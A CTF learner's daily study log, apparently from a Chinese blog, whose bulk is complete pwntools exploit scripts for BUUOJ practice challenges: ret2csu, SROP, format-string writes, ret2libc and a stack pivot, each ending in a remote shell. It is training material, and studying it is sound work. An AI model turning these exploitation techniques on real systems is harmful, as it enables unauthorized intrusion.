21.07.15学习总结
Column: July 15, 2021
Tags: learning experience
05:00-05:15: 补档昨天的学习总结和继续整理ctf套路集合
05:20-05:50: 写了两种ciscn_2019_s_3的解法, 一种昨天想的csu, 一种基础srop(顺便稍微复习了一下, 注意这个由于出现了不可避免的push rbp, 所以要先处理一下rbp)
05:55-06:10: 更新ctf套路集合, 加入了部分常用代码
06:45-08:15: buuoj刷题:
fm: %x$…这玩意忘了, 做了一会才做出了…
17:00-17:40: buuoj
21:30-22:30: buuoj, ez_pz_hackover_2016这题我做的太麻烦了, 虽然也收获了点东西(fgets的第三个参数应该是加上libc的真实地址, 而且stdin这种东西, libc里直接找是找不到的)
22:40-24:00: 英语口语学习, 就学了六个元音, 练到舌头打结了…
ciscn_2019_s_3(方法一: csu):
#!/usr/bin/env python
# coding=utf-8
# ciscn_2019_s_3, variant 1 (ret2csu) against the BUUOJ practice instance.
# Written for Python 2 pwntools: plain str is concatenated with the output
# of p64(), which raises TypeError under Python 3.
from pwn import *
#sh=process('./ciscn_s_3')
sh=remote('node4.buuoj.cn',28891)
elf=ELF('./ciscn_s_3')
libc=elf.libc  # loaded but not referenced anywhere below
context.log_level='debug'
# Fixed addresses from the (non-PIE) binary; the two __libc_csu_init gadgets
# are listed in the disassembly string further down.
read=0x4004F1
pop_rdi=0x4005a3
mov_rax_exe=0x4004e2
csu_1=0x400580
csu_2=0x400596
syscall_addr=0x400517
#gdb.attach(sh, '''b *0x400517''')
# Round 1: 16 filler bytes, then the saved return address is replaced by `read`.
sh.send('w'*16+p64(read))
# Discard the first 0x20 bytes of the reply; the next 8 are taken as a leaked
# stack pointer (little-endian, via u64).
sh.recv(0x20)
leak_stack=u64(sh.recv(8))
log.success('leak stack: '+hex(leak_stack))
'''
csu1:
0x400580 <__libc_csu_init+64>: mov rdx,r13
0x400583 <__libc_csu_init+67>: mov rsi,r14
0x400586 <__libc_csu_init+70>: mov edi,r15d
=> 0x400589 <__libc_csu_init+73>: call QWORD PTR [r12+rbx*8]
0x40058d <__libc_csu_init+77>: add rbx,0x1
0x400591 <__libc_csu_init+81>: cmp rbx,rbp
0x400594 <__libc_csu_init+84>: jne 0x400580 <__libc_csu_init+64>
csu2:
0x400596 <__libc_csu_init+86>: add rsp,0x8
0x40059a <__libc_csu_init+90>: pop rbx
0x40059b <__libc_csu_init+91>: pop rbp
0x40059c <__libc_csu_init+92>: pop r12
0x40059e <__libc_csu_init+94>: pop r13
0x4005a0 <__libc_csu_init+96>: pop r14
0x4005a2 <__libc_csu_init+98>: pop r15
0x4005a4 <__libc_csu_init+100>: ret
'''
# Round 2: "/bin/sh\0" twice, then csu_2, whose pops consume the next seven
# qwords in the order given in the string below (rsp+8, rbx, rbp, r12, r13,
# r14, r15) before falling into csu_1.  r12 is set to leak_stack-0xe8 and
# r13/r14/r15 to 0; the chain then continues with pop_rdi, mov_rax_exe and
# the syscall gadget.
# NOTE(review): the qword in the rbp slot is 0x40051b, while the inline note
# says "rbp:pop_rdi" (pop_rdi is 0x4005a3) — confirm which one is intended.
sh.send('/bin/sh\x00'*2+p64(csu_2)+p64(0)+p64(0)+p64(0x40051b)+p64(leak_stack-0xe8)+p64(0)+p64(0)+p64(0)+p64(csu_1)+p64(pop_rdi)+p64(leak_stack-0x108)+p64(mov_rax_exe)+p64(syscall_addr))
''' rsp+8 rbx rbp:pop_rdi r12 r13 r14 r15'''
sh.interactive()
ciscn_2019_s_3(方法二: srop):
#!/usr/bin/env python
# coding=utf-8
# ciscn_2019_s_3, variant 2 (SROP).  Python 2 pwntools: str(frame) and the
# str + p64() concatenation below do not work unchanged on Python 3.
from pwn import *
sh=process('./ciscn_s_3')
#sh=remote('node4.buuoj.cn',28891)
elf=ELF('./ciscn_s_3')
libc=elf.libc  # loaded but not referenced anywhere below
context.log_level='debug'
# context.binary sets the architecture that SigreturnFrame() builds for.
context.binary='./ciscn_s_3'
# Fixed gadget addresses from the (non-PIE) binary.
mov_rax_15=0x4004D6
syscall_addr=0x400517
read_addr=0x4004F1
pop_rbp=0x4004EB
#gdb.attach(sh, '''b *0x400517''')
# Round 1: 16 filler bytes, then the return address is replaced by read_addr.
sh.send('w'*16+p64(read_addr))
# Read 0x28 bytes and take the last 8 as the leaked stack pointer.
leak_stack=u64(sh.recv(0x28)[-8:])
log.success('leak stack: '+hex(leak_stack))
# Stack address where the "/bin/sh" string sent in round 2 is expected to sit.
bin_sh_addr=leak_stack-0x110
# Fake signal frame restored by rt_sigreturn: rip -> syscall gadget,
# rax -> execve number, rdi -> "/bin/sh", rsi = rdx = 0, rsp -> leaked stack.
frame=SigreturnFrame()
frame.rip=syscall_addr
frame.rax=constants.SYS_execve
frame.rdi=bin_sh_addr
frame.rsi=0
frame.rdx=0
frame.rsp=leak_stack
# pop_rbp precedes the syscall gadget (see the author's note above about an
# unavoidable push rbp); mov_rax_15 sets rax to the sigreturn number before
# the frame is consumed.
payload='/bin/sh\x00'*2+p64(pop_rbp)+p64(syscall_addr)+p64(mov_rax_15)+str(frame)
sh.send(payload)
sh.interactive()
jarvisoj_fm(基础格式化字符串, %$这玩意不计入n中):
#!/usr/bin/env python
# coding=utf-8
# jarvisoj_fm: single format-string write.  Python 2 pwntools (p32() output
# is concatenated with a plain str).
from pwn import *
#sh=process('./fm')
sh=remote('node4.buuoj.cn',28882)
elf=ELF('./fm')
#context.log_level='debug'
# Target address 0x804a02c followed by a positional %n directive (argument
# index 11).  As the heading notes, the "11$" selector is not counted
# towards the characters written by %n.
payload=p32(0x804a02c)+'%11$n'
sh.send(payload)
sh.interactive()
[HarekazeCTF2019]baby_rop2:
#!/usr/bin/env python
# coding=utf-8
# [HarekazeCTF2019]baby_rop2: two-stage ROP, leak then ret2libc.
# Python 2 pwntools: str + p64() concatenation and libc.search(...).next()
# are not valid on Python 3.
from pwn import *
#sh=process('./babyrop2')
sh=remote('node4.buuoj.cn',25518)
elf=ELF('./babyrop2')
context.log_level='debug'
#libc=elf.libc
# The libc shipped with the challenge is used for symbol offsets.
libc=ELF('./libc/libc.so.6')
pop_rdi=0x400733
pop_rsi_r15=0x400731
fmt_addr=0x400770
main_addr=0x400636
#gdb.attach(sh, '''b *0x4006ca''')
# Stage 1: 0x28 filler bytes, then printf(fmt_addr, got['read']) with r15=0,
# returning to main so a second input round is possible.
payload1='w'*0x28+p64(pop_rdi)+p64(fmt_addr)+p64(pop_rsi_r15)+p64(elf.got['read'])\
+p64(0)+p64(elf.sym['printf'])+p64(main_addr)
sh.send(payload1)
sh.recvuntil('again, ')
sh.recvuntil('again, ')
# The leaked pointer arrives as 6 bytes; pad to 8 before u64.
read_addr=u64(sh.recv(6).ljust(8, '\x00'))
libc_base=read_addr-libc.sym['read']
log.success('read addr: '+hex(read_addr))
log.success('libc base: '+hex(libc_base))
# Stage 2: system("/bin/sh") using the rebased libc addresses.
payload2='b'*0x28+p64(pop_rdi)+p64(libc_base+libc.search('/bin/sh\x00').next())\
+p64(libc_base+libc.sym['system'])
sh.recvuntil("What's your name? ")
sh.send(payload2)
sh.interactive()
ciscn_2019_es_2(栈迁移):
#!/usr/bin/env python
# coding=utf-8
# ciscn_2019_es_2: stack pivot via a leave;ret gadget (32-bit target).
# Python 2 pwntools: str is concatenated with p32() output.
from pwn import *
#sh=process('./ciscn_2019_es_2')
sh=remote('node4.buuoj.cn',28650)
elf=ELF('./ciscn_2019_es_2')
libc=ELF('./libc-2.27.so')  # loaded but not referenced anywhere below
#libc=elf.libc
context.log_level='debug'
leave_ret=0x8048562
#gdb.attach(sh, '''b *0x80485cd''')
# Round 1: fill 40 bytes so the 4 bytes echoed right after them can be read
# back as a leaked stack pointer; the rest of the reply is drained.
sh.send('w'*40)
sh.recvuntil('w'*40)
leak_stack=u32(sh.recv(4))
sh.recv()
log.success('leak stack: '+hex(leak_stack))
# Address where the buffer read in round 2 is expected to start.
read_stack_addr=leak_stack-0x38
# Round 2 buffer: system, return-to-main, pointer to the "/bin/sh" string
# that sits at read_stack_addr+0xc, padded to 40 bytes; the saved ebp is
# then set to read_stack_addr-4 and the return address to leave_ret so the
# stack pivots into this buffer.
payload=p32(elf.sym['system'])+p32(elf.sym['main'])+p32(read_stack_addr+0xc)\
+'/bin/sh\x00'
payload+='a'*(40-len(payload))+p32(read_stack_addr-4)+p32(leave_ret)
sh.send(payload)
#sh.send('w'*40+p32(leave_ret))
sh.interactive()
ez_pz_hackover_2016(其实两次就够了):
#!/usr/bin/env python
# coding=utf-8
# ez_pz_hackover_2016: four rounds against the `chall` function, each
# returning to chall so the next round can be sent (the heading notes two
# rounds would have sufficed).  Python 2 pwntools: str + p32() concatenation.
from pwn import *
#sh=process('./ez_pz_hackover_2016')
sh=remote('node4.buuoj.cn',29181)
elf=ELF('./ez_pz_hackover_2016')
#context.log_level='debug'
libc=ELF('./libc-2.23.so')
# Round 1: printf(0x8048845, got['stdin']) then return to chall.
# Each payload starts with "crashme\0" followed by filler up to the return
# address slot.
payload1="crashme"+p32(0)+'wwww'*3+'bbb'+p32(elf.sym['printf'])+p32(elf.sym['chall'])\
+p32(0x8048845)+p32(elf.got['stdin'])
sh.recv()
sh.sendline(payload1)
sh.recvuntil('Welcome ')
sh.recvuntil('Welcome ')
stdin_addr=u32(sh.recv(4))
# This libc_base is overwritten further down by the printf-based value; the
# author's note above says stdin cannot be resolved directly in libc.
libc_base=stdin_addr-libc.sym['stdin']
log.success('stdin addr: '+hex(stdin_addr))
# Round 2: fgets(0x804a400, 0x10, stdin_addr) then return to chall; the
# "/bin/sh" line sent right after is what fgets reads.
payload2="crashme"+p32(0)+'wwww'*3+'bbb'+p32(elf.sym['fgets'])+p32(elf.sym['chall'])\
+p32(0x804a400)+p32(0x10)+p32(stdin_addr)
sh.recv()
sh.sendline(payload2)
sh.sendline('/bin/sh\x00')
# Round 3: printf(0x8048845, got['printf']) then return to chall, to get a
# libc pointer that can be rebased.
payload3="crashme"+p32(0)+'wwww'*3+'bbb'+p32(elf.sym['printf'])+p32(elf.sym['chall'])\
+p32(0x8048845)+p32(elf.got['printf'])
sh.recv()
sh.sendline(payload3)
sh.recvuntil('Welcome ')
sh.recvuntil('Welcome ')
printf_addr=u32(sh.recv(4))
libc_base=printf_addr-libc.sym['printf']
# NOTE(review): the label says 'libc base' but the value printed is
# printf_addr; libc_base is the variable computed on the line above.
log.success('libc base: '+hex(printf_addr))
# Round 4: system(0x804a400) with 'bye~' as the return-address filler.
payload4="crashme"+p32(0)+'wwww'*3+'bbb'+p32(libc_base+libc.sym['system'])+'bye~'\
+p32(0x804a400)
sh.recv()
sh.sendline(payload4)
sh.interactive()